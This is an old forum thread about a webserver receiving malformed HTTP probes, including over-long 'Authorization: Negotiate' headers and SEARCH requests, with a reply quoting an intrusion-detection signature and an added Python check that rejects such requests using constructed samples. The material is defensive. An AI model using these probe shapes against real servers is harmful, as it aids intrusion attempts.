webserver attack attempt

Posted by yarmfelder on July 14, 2005, 5:24 am
I've got some people who are trying to attack my
webserver, which is not Apache. But I would guess
they think it is, or perhaps they think it is
M$.

What they do is one of two things: either
they will send an HTTP request that is far too
short, or one that is far too long. An example
of the long kind:

GET / HTTP/1.0
Authorization: Negotiate

.... and it goes on from there, beyond the maximum number of
bytes that is allowed. Of course, this has no effect, because
it's a well written server. But I suppose that if someone were
to decode that string, they might find some runnable code in
there.

Another long one follows. Notice it is neither GET nor POST.

SEARCH
....etc.

YF
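
An added example, not part of the original thread and not the poster's server code: a pre-parse check that classifies the request shapes described above (too short, over-long request line, over-long header, method other than GET or POST). The limits, the allow-list and the function name `classify_request` are assumptions made for this sketch, and the sample requests are constructed.

```python
import re

# Limits and the method allow-list are assumptions chosen for this example.
MAX_REQUEST_LINE = 2048   # bytes: method, target and version
MAX_HEADER_LINE = 4096    # bytes per header line
MAX_HEADERS = 64
ALLOWED_METHODS = {b"GET", b"HEAD", b"POST"}
# Target limited to printable ASCII, so raw control or high bytes are rejected.
REQUEST_LINE = re.compile(rb"([A-Z]+) ([\x21-\x7e]+) HTTP/1\.[01]")


def classify_request(raw: bytes):
    """Return (status, reason) for the head of one request; 200 means accept.

    The caller is assumed to have capped how many bytes it reads from the socket.
    """
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    request_line, headers = lines[0], lines[1:]
    # Length check comes first so the regex never runs on an oversized line.
    if len(request_line) > MAX_REQUEST_LINE:
        return 414, "request line too long"
    match = REQUEST_LINE.fullmatch(request_line)
    if match is None:
        return 400, "short or malformed request line"
    if match.group(1) not in ALLOWED_METHODS:
        return 501, "method not supported"
    if len(headers) > MAX_HEADERS:
        return 431, "too many header lines"
    for line in headers:
        if len(line) > MAX_HEADER_LINE:
            # Log only the header name, never the oversized value.
            name = line.split(b":", 1)[0][:32].decode("ascii", "replace")
            return 431, "header too long: " + name
    return 200, "ok"


# Constructed samples modelled on the request shapes described in the post.
SAMPLES = {
    "normal": b"GET /index.html HTTP/1.0\r\nHost: example.test\r\n\r\n",
    "too_short": b"GET\r\n\r\n",
    "long_negotiate": b"GET / HTTP/1.0\r\nAuthorization: Negotiate "
                      + b"A" * 8000 + b"\r\n\r\n",
    "long_search": b"SEARCH /" + b"\x02\xb1" * 2000 + b" HTTP/1.0\r\n\r\n",
    "short_search": b"SEARCH / HTTP/1.1\r\n\r\n",
}

if __name__ == "__main__":
    for label, sample in SAMPLES.items():
        print(label, classify_request(sample))
```

Logging the status and reason per source address, rather than the raw request, keeps the oversized payload out of the log files while still showing which probe was sent.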



Posted by Newsgroup Poster on July 14, 2005, 4:11 pm
Hope this is of help:

http://translate.google.com/translate?hl=en&sl=ja&u=http://www.netpub.tsuzuki.yokohama.jp/detect/rule.html&prev=/search%3Fq%3D%2522YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQUFBQUF%2522%26hl%3Den%26lr%3D%26safe%3Doff


2005/06/04 Attempt of cash server C -> S TCP 80 or 8080 ? "HTTP/1" and "Authorization: Negotiate" and "YIIQegYGKwYBBQUCoIIQbjC$$C$$EGqhghBmI4IQYgcOcbaeaqufbqufbquf"



http://216.239.59.104/search?q=cache:vqyN-OJEj-kJ:www.forbiddenweb.org/viewtopic.php%3Fid%3D33961+%22Authorization:+Negotiate%22&hl=en&start=10

